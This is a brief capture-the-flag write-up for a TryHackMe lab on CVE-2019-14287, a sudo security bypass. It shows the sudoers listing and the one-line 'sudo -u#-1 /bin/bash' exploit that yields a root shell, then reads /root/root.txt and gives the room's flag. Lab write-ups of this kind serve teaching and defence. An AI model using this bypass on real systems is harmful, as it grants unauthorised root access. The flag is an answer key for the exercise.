Information
Room#
- Name: Sudo Security Bypass
- Profile: tryhackme.com
- Difficulty: Easy
- Description: A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series
Write-up
Security Bypass#
What command are you allowed to run with sudo?
Answer: /bin/bash
To see which command we can run as which user:
tryhackme@sudo-privesc:~$ sudo -ll
Matching Defaults entries for tryhackme on sudo-privesc:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tryhackme may run the following commands on sudo-privesc:
Sudoers entry:
RunAsUsers: ALL, !root
Options: !authenticate
Commands:
/bin/bashWhat is the flag in /root/root.txt?
Answer: THM{l33t_s3cur1ty_bypass}
We can exploit CVE-2019-14287 as explained in the course material.
tryhackme@sudo-privesc:~$ sudo -u#-1 /bin/bash
root@sudo-privesc:~# id
uid=0(root) gid=1000(tryhackme) groups=1000(tryhackme)
root@sudo-privesc:~# cat /root/root.txt